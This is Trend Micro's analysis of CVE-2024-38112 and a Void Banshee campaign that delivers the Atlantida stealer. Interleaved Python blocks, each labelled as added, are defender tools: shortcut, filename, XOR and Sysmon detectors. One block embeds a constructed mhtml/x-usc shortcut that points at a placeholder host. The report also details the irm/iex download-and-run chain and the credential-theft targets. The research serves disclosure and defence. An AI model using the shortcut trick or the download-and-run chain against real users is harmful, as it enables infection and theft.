CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks – Trend Micro

Exploits & Vulnerabilities
Our threat hunters discovered CVE-2024-38112, which was used as a zero-day by APT group Void Banshee, to access and execute files through the disabled Internet Explorer using MSHTML. We promptly identified and reported this zero-day vulnerability to Microsoft, and it has been patched.
By: Peter Girnus, Aliakbar Zahravi
Report Highlights:
Trend Micro Zero Day Initiative (ZDI) discovered the MHTML remote code execution (RCE) vulnerability CVE-2024-38112. We immediately alerted Microsoft that this vulnerability was being used in the wild, tracked as ZDI-CAN-24433. CVE-2024-38112 was used as part of an attack chain by the advanced persistent threat (APT) group Void Banshee, which targets North American, European, and Southeast Asian regions for information theft and financial gain. The final payload of this zero-day attack chain is the Atlantida stealer, which was first discovered in January 2024. Variations of the Atlantida campaign have been highly active throughout 2024 and have evolved to use CVE-2024-38112 as part of Void Banshee infection chains.
In mid-May 2024, we tracked this updated Void Banshee campaign using internal and external telemetry. The Void Banshee group used similar tools, tactics, and procedures (TTPs) that involved abusing internet shortcuts (.URL) and Microsoft protocol handlers and URI schemes, including the MHTML (MIME encapsulation of aggregate HTML documents) protocol which was able to access Windows system-disabled Internet Explorer.
In the attack chain shown in Figure 1, the threat actor leveraged CVE-2024-38112 to execute malicious code by abusing the MHTML protocol handler and x-usc directives through internet shortcut (URL) files. Using this technique, the threat actor was able to access and run files directly through the disabled Internet Explorer instance on Windows machines. This MHTML code execution vulnerability was used to infect users and organizations with Atlantida malware.
Trend provides protection to users from threat actors that exploit CVE-2024-38112 via the security solutions listed at the end of this blog entry.
Internet Explorer (IE) officially reached end of support on June 15, 2022. Additionally, IE has been officially disabled in later versions of Windows 10 and in all versions of Windows 11. Disabled, however, does not mean IE was removed from the system. The remnants of IE still exist on modern Windows systems, though they are not accessible to the average user (Figure 2).
If users attempt to execute the IE executable (iexplore.exe), instead its replacement, Microsoft Edge, opens. For users and organizations that need to access sites and workloads through Internet Explorer, Microsoft has provided IE mode for Microsoft Edge (Figure 3). IE mode for Edge contains some IE-specific functionality, but operates inside the Microsoft Edge sandbox, which in theory provides enhanced security for the end user.
In this campaign, the ZDI threat hunting team discovered and analyzed samples exploiting CVE-2024-38112, which we disclosed to Microsoft. These samples could run and execute files and websites through the disabled IE process by exploiting CVE-2024-38112 through MSHTML. By using specially crafted .URL files that contained the MHTML protocol handler and the x-usc! directive, Void Banshee was able to access and run HTML Application (HTA) files directly through the disabled IE process. This method of exploitation is similar to CVE-2021-40444, another MSHTML vulnerability that was used in zero-day attacks. Using the disabled IE process as a proxy to access sites and scripts is especially alarming, as IE has historically been a vast attack surface and now receives no further updates or security fixes.
This vulnerability was patched as part of the July 2024 Patch Tuesday. As of this patch cycle, Microsoft has unregistered the MHTML handler from Internet Explorer (Figure 4).
This means that MHTML is no longer usable inside of internet shortcut files.
Void Banshee used zip archives containing copies of books in PDF format, along with malicious files disguised as PDFs in spearphishing links (T1566.002), on online libraries, cloud sharing sites, Discord, and a slew of compromised websites.
Some PDF lures we uncovered during our analysis of the Void Banshee campaign include textbooks and reference material such as Clinical Anatomy, which suggests the campaign is targeting highly skilled professionals and students who often use reference materials and places where digital copies of books are collected (Figure 5). In the case of exploiting CVE-2024-38112, Void Banshee changed the default icon of an internet shortcut file to that of a PDF file to entice the victim into executing it.
The zero-day attack begins when the victim opens a URL shortcut file designed to exploit CVE-2024-38112. One of the samples we uncovered, "Books_A0UJKO.pdf.url", is designed to look like a PDF copy of a book (Figure 6). The URL shortcut uses the MHTML protocol handler and the x-usc! directive through the internet shortcut’s URL parameter. This logic string is similar to the exploit logic of CVE-2021-40444 (Microsoft Office Remote Code Execution Vulnerability), highlighting the continued misuse of Windows protocol handlers. 
In this attack, CVE-2024-38112 was used as a zero-day to open the system-disabled IE and redirect the victim to a compromised website that hosted a malicious HTML Application (HTA), as shown in Figure 7.
In the URL parameter of the internet shortcut file, we can see that Void Banshee specifically crafted this URL string using the MHTML protocol handler along with the x-usc! directive. This logic string opens the URL target in the native Internet Explorer through the iexplore.exe process.
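A defender-side triage check for internet shortcut files, added here as an example and not code from the original report or from Trend Micro: it parses the INI structure of a .URL file and flags the traits described above (an mhtml: target, an x-usc directive, a document-style double extension in the filename, and a PDF-viewer icon on a target that is not a PDF). The sample shortcuts, their domains and the icon path are constructed for the example.

```python
import configparser
import re
from dataclasses import dataclass, field

# Constructed sample shortcut modelled on the traits described above; the
# domains and icon path are placeholders, not the campaign's real values.
SUSPICIOUS_URL_FILE = """[InternetShortcut]
URL=mhtml:http://lure.invalid/landing.html!x-usc:http://lure.invalid/landing.html
IconFile=C:\\Program Files\\PDF Viewer\\pdfviewer.exe
IconIndex=1
"""

# Constructed benign shortcut for comparison.
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://docs.example.invalid/handbook.pdf
IconFile=C:\\Program Files\\PDF Viewer\\pdfviewer.exe
IconIndex=1
"""

DOCUMENT_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt)$", re.IGNORECASE)
PDF_ICON_HINT = re.compile(r"pdf|acro|reader", re.IGNORECASE)


@dataclass
class ShortcutFinding:
    filename: str
    target: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def analyze_url_shortcut(filename: str, content: str) -> ShortcutFinding:
    """Parse a .URL file (INI format) and report traits of the lure described above."""
    # Only '=' separates keys from values; the default ':' delimiter would split URLs.
    parser = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    parser.read_string(content)
    section = parser["InternetShortcut"] if parser.has_section("InternetShortcut") else {}
    target = section.get("url", "").strip()       # configparser lower-cases option names
    icon = section.get("iconfile", "").strip()
    finding = ShortcutFinding(filename, target)

    lowered = target.lower()
    if lowered.startswith("mhtml:"):
        finding.reasons.append("target uses the mhtml: protocol handler (routes to MSHTML/IE)")
    if "x-usc" in lowered:
        finding.reasons.append("target carries an x-usc directive")
    # e.g. "Books_A0UJKO.pdf.url": a document extension placed before the real .url extension
    stem = filename[:-4] if filename.lower().endswith(".url") else filename
    if DOCUMENT_EXT.search(stem):
        finding.reasons.append("filename mimics a document (double extension)")
    # Heuristic: a PDF-viewer icon on a shortcut whose target is not a PDF
    first_target = lowered.split("!", 1)[0]
    if PDF_ICON_HINT.search(icon) and not first_target.endswith(".pdf"):
        finding.reasons.append("PDF-style icon on a target that is not a PDF")
    return finding
```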
As mentioned above, the internet shortcut file that exploits CVE-2024-38112 points to an attacker-controlled domain where an HTML file downloads the HTA stage of the infection chain (Figure 8). Using this HTML file, the attacker can also control the window view size of the website through IE. This is used by the threat actor to hide browser information and to mask the downloading of the next stage of the infection chain from the victim. Void Banshee specifically crafted this HTML file using window size elements to control the window size of IE.
Once this URL is contacted via IE, it attempts to open the malicious HTA file, prompting the user to open or save the HTML application (Figure 9). This behavior is unique to IE in that HTA files are opened by default, whereas modern browsers like Microsoft Edge or Chrome do not have the default open action.
The attacker pads the malicious HTA filename "Books_A0UJKO.pdf.hta" with 26 spaces before the .hta extension to push the extension off the screen (Figure 10). The ellipsis indicates that the filename contains additional content; however, it is not clickable or expandable. To an unsuspecting user, it appears to be merely a PDF file.
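A small filename check for the padding trick described above, added as an example (not code from the original report): it splits off the real extension, measures the whitespace inserted before it, and reports which extension a truncated display would show. The sample name is constructed with the same shape as the lure (26 spaces before .hta).

```python
import os

# Extensions that Windows executes or hands to a script/HTML host on double-click
EXECUTABLE_EXT = {".hta", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".exe",
                  ".scr", ".cmd", ".bat", ".lnk", ".url"}

# Constructed name with the same shape as the lure discussed above
SAMPLE_NAME = "Books_A0UJKO.pdf" + " " * 26 + ".hta"


def check_padded_extension(filename: str, min_padding: int = 4) -> dict:
    """Report whether a filename hides an executable extension behind whitespace padding."""
    stem, real_ext = os.path.splitext(filename)     # splitext keeps the padded stem
    padding = len(stem) - len(stem.rstrip())        # any Unicode whitespace counts
    display_name = stem.rstrip()
    shown_ext = os.path.splitext(display_name)[1]   # what a truncated display shows
    hidden = (
        real_ext.lower() in EXECUTABLE_EXT
        and padding >= min_padding
        and shown_ext != ""
    )
    return {
        "display_name": display_name,
        "shown_ext": shown_ext.lower(),
        "real_ext": real_ext.lower(),
        "padding": padding,
        "hidden_extension": hidden,
    }
```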
The HTA file contains a Visual Basic Script (VBScript) that decrypts XOR-encrypted content with key 4 and executes the content using PowerShell (Figure 11). This script uses PowerShell to download an additional script hosted on a compromised web server and executes it using the PowerShell aliases irm (Invoke-RestMethod) and iex (Invoke-Expression). Finally, the script creates a new process for the downloaded script using the Win32_Process WMI class.
Initially, the script defines the DllImport attributes to import two functions:
It then uses the Add-Type cmdlet to add the type defined in $crop213 to the current PowerShell session, under the namespace crumble542543 with the name culture6546.
Next, the script retrieves the handle of the console window using the GetConsoleWindow method and stores it in $danger5646. It then calls ShowWindow with the window handle and the parameter 0, which hides the console window. This technique is often employed in malware to run without displaying any user interface.
The script proceeds to create a new System.Net.WebClient object, which is used to download data from a malicious server. This downloaded data is subsequently loaded as a .NET assembly using the System.Reflection.Assembly’s Load method. Finally, the script invokes the entry point of the downloaded assembly, effectively executing the code contained within it.
LoadToBadXml is a .NET Trojan loader that is obfuscated using Eziriz .NET Reactor. As shown in Figure 13, it decrypts XOR-encrypted payloads using a byte array key (3, 2, 2).
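Both XOR layers described above (the HTA's single-byte key 4 and the loader's repeating key (3, 2, 2)) can be peeled off the same way during analysis. The helper below is an added example, not code from the report or the malware: it derives the shortest repeating XOR key from a known plaintext prefix and, for PE payloads, validates the result against the DOS and PE signatures. The encrypted inputs are constructed in the block; the "powershell.exe" command used as sample plaintext is benign.

```python
import struct
from itertools import cycle
from typing import Callable, Optional

# A typical PE / .NET assembly begins with this DOS header prefix (MZ, e_cblp=0x90, e_cp=3)
PE_PREFIX = b"MZ\x90\x00\x03\x00\x00\x00"


def xor_crypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the operation is its own inverse."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def looks_like_pe(data: bytes) -> bool:
    """Check the MZ signature and that e_lfanew points at a PE\\0\\0 signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_xor_key(blob: bytes, known_prefix: bytes, max_key_len: int = 8,
                    validate: Optional[Callable[[bytes], bool]] = None):
    """Return (key, plaintext) for the shortest key that maps blob's start onto known_prefix.

    A candidate is accepted only if it reproduces the whole known prefix and, when a
    validate() callback is given, the decrypted output passes it. Returns None on failure.
    """
    for key_len in range(1, min(max_key_len, len(known_prefix)) + 1):
        key = bytes(c ^ p for c, p in zip(blob[:key_len], known_prefix[:key_len]))
        if xor_crypt(blob[:len(known_prefix)], key) != known_prefix:
            continue
        plain = xor_crypt(blob, key)
        if validate is None or validate(plain):
            return key, plain
    return None


def build_sample_pe() -> bytes:
    """Constructed minimal PE-shaped blob: 64-byte DOS header whose e_lfanew is 0x40."""
    header = bytearray(0x40)
    header[:len(PE_PREFIX)] = PE_PREFIX
    struct.pack_into("<I", header, 0x3C, 0x40)
    return bytes(header) + b"PE\x00\x00" + bytes(20)


# Constructed inputs: a PE blob under the loader-style key (3, 2, 2) and a benign
# command string under the HTA-style single-byte key 4.
ENCRYPTED_PE = xor_crypt(build_sample_pe(), bytes([3, 2, 2]))
ENCRYPTED_SCRIPT = xor_crypt(b"powershell.exe -NoProfile -Command Get-Date", b"\x04")
```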
It then injects them into C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe. The malware employs a common process injection technique, which involves the following steps:
LoadToBadXml is a modified version of the shellcode injector from Program.cs of the open-source project Donut Loader (Figure 14).
Donut is open-source position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files, and .NET assemblies. In this attack, Donut is used to decrypt and execute the Atlantida stealer inside the RegAsm.exe process memory.
The final payload delivered in this attack is the Atlantida stealer, an info-stealer malware with extensive capabilities. Overall, the malware is built from the open-source stealers NecroStealer and PredatorTheStealer, incorporating many of the same functions and structures found in these programs. It targets sensitive information from various applications, including Telegram, Steam, FileZilla, various cryptocurrency wallets, and web browsers. This malware focuses on extracting stored sensitive and potentially valuable data, such as passwords and cookies, and it can also collect files with specific extensions from the infected system’s desktop. Moreover, the malware captures the victim’s screen and gathers comprehensive system information. The stolen data is then compressed into a ZIP file and transmitted to the attacker via TCP.

Upon execution, the malware initializes the ZIP file, sets up the necessary structures, and manages the process of writing files to the archive. It then retrieves the "APPDATA" and "DESKTOP" paths and stores them in a global variable. This variable is later used throughout the code to access these locations, utilizing the SHGetFolderPathA Windows API with CSIDL values "0x1A" and "0x00," respectively.
Afterward, it takes a screenshot, saves it as "screenshot.jpeg," and adds it to the ZIP. The compression method is similar to the one used in zip.cpp for Necro Stealer and PredatorTheStealer.
To retrieve an infected system’s geolocation information, such as IP address, country, and zip code, the malware contacts its command-and-control (C&C) server over port 6666 instead of using public services. Figure 15 shows an example of a C&C response: 
The malware then stores this in the “Geo Information.txt” and appends it to the ZIP archive (Figure 16). 
Next, the malware starts to collect system information such as RAM, GPU, CPU, and screen resolution and stores it in “User Information.txt”, subsequently appending this file to the ZIP archive held in memory (Figure 17). Furthermore, the malware harvests credentials and sensitive files from various applications. For FileZilla, the malware searches for the XML file located at C:\Users\<USERNAME>\AppData\Roaming\FileZilla\recentservers.xml, which contains information about recently connected servers. This XML file typically includes data such as the server’s hostname, port number, username, and connection type. Additionally, the malware attempts to steal data that includes:
The Atlantida stealer has the ability to steal information from cryptocurrency-related Google Chrome and Microsoft Edge extensions. For each extension, an “Extension ID” is given. The malware uses this information to harvest data stored within.
This is the extension path:
The following is a browser extension list of cryptocurrency wallets:
The malware compresses all the collected data into a ZIP file and exfiltrates it to the attacker’s C&C server over TCP port 6655. 
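The two C&C ports named above, together with the injection host, give a concrete network-side detection opportunity: RegAsm.exe is a .NET registration utility and has no reason to open outbound TCP connections at all, let alone to ports 6666 or 6655. The following is an added example (not a Trend Micro detection rule or product code) that runs that logic over constructed Sysmon Event ID 3 records flattened to key=value lines; the IP addresses are documentation ranges, not campaign indicators.

```python
import re

# Constructed Sysmon Event ID 3 (network connection) records, flattened to key=value lines.
SAMPLE_EVENTS = [
    "EventID=3 Image=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe DestinationIp=203.0.113.10 DestinationPort=6666 Protocol=tcp",
    "EventID=3 Image=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe DestinationIp=203.0.113.10 DestinationPort=6655 Protocol=tcp",
    "EventID=3 Image=C:\\Program Files\\Mozilla Firefox\\firefox.exe DestinationIp=198.51.100.7 DestinationPort=443 Protocol=tcp",
    "EventID=3 Image=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe DestinationIp=203.0.113.10 DestinationPort=443 Protocol=tcp",
    "EventID=1 Image=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe CommandLine=RegAsm.exe",
]

# Ports the report attributes to Atlantida's C&C traffic
ATLANTIDA_PORTS = {6666: "geolocation lookup", 6655: "ZIP exfiltration"}
# Injection host named in the report; extend this set for other hosts seen in your environment
INJECTION_HOSTS = {"regasm.exe"}

# key=value pairs; a value runs until the next " key=" token, so paths with spaces survive
FIELD_RE = re.compile(r"(\w+)=(.*?)(?= \w+=|$)")


def parse_event(line: str) -> dict:
    """Split a flattened 'key=value key=value' record into a dict."""
    return dict(FIELD_RE.findall(line))


def find_atlantida_traffic(lines) -> list:
    """Return network events from an injection host, rated high on known C&C ports, medium otherwise."""
    hits = []
    for line in lines:
        event = parse_event(line)
        if event.get("EventID") != "3":          # only network-connection events
            continue
        image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
        if image not in INJECTION_HOSTS:
            continue
        port = int(event.get("DestinationPort", "0"))
        if port in ATLANTIDA_PORTS:
            severity = "high"
            note = "known Atlantida C&C port: " + ATLANTIDA_PORTS[port]
        else:
            severity = "medium"
            note = "unexpected outbound connection from a .NET utility"
        hits.append({"image": image, "dst": event.get("DestinationIp"),
                     "port": port, "severity": severity, "note": note})
    return hits
```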
In this campaign, we have observed that even though users may no longer be able to access IE, threat actors can still exploit lingering Windows relics like IE on their machines to infect users and organizations with ransomware or backdoors, or use them as a proxy to execute other strains of malware. The ability of APT groups like Void Banshee to exploit disabled services such as IE poses a significant threat to organizations worldwide. Since services such as IE have a large attack surface and no longer receive patches, they represent a serious security concern for Windows users. Furthermore, the ability of threat actors to access unsupported and disabled system services to circumvent modern web sandboxes such as IE mode for Microsoft Edge highlights a significant industry concern.
To make software more secure and protect customers from zero-day attacks, Trend ZDI works with security researchers and vendors to patch and responsibly disclose software vulnerabilities before APT groups can deploy them in attacks. The ZDI Threat Hunting team also proactively hunts for zero-day attacks in the wild to safeguard the industry. The ZDI program is the largest vendor-agnostic bug bounty program in the world while disclosing vulnerabilities to vendors at 2.5x the rate.
Organizations can help protect themselves from these kinds of attacks with Trend Vision One™️, which enables security teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision One helps organizations prioritize and address potential risks, including vulnerabilities. It considers critical factors such as the likelihood and impact of potential attacks and offers a range of prevention, detection, and response capabilities. This is all backed by advanced threat research, intelligence, and AI, which helps reduce the time taken to detect, respond, and remediate issues. Ultimately, Vision One can help improve the overall security posture and effectiveness of an organization, including against zero-day attacks.
When faced with uncertain intrusions, behaviors, and routines, organizations should assume that their systems are already compromised or breached and work to immediately isolate affected data or toolchains. With a broader perspective and rapid response, organizations can address breaches and protect their remaining systems, especially with technologies such as Trend Micro Endpoint Security and Trend Micro Network Security, as well as comprehensive security solutions such as Trend Micro™ XDR, which can detect, scan, and block malicious content across the modern threat landscape.
The following protections exist to detect and protect Trend customers against the zero-day CVE-2024-38112 (ZDI-CAN-24433) and Atlantida malware exfiltration attempts.
Download the full list of IOCs here.
The Zero Day Initiative would like to thank the following Trenders for their contributions in ensuring that Trend Micro customers were protected from this zero-day attack pre-patching:
Scott Graham, Mohamad Mokbel, Abdelrahman Esmail, Simon Dulude, Senthil Nathan Sankar, Amit Kumar, and a special thanks to the content writers and marketing teams for helping with this research.
Peter Girnus
Sr. Threat Researcher
Aliakbar Zahravi
Staff Researcher
Copyright ©2024 Trend Micro Incorporated. All rights reserved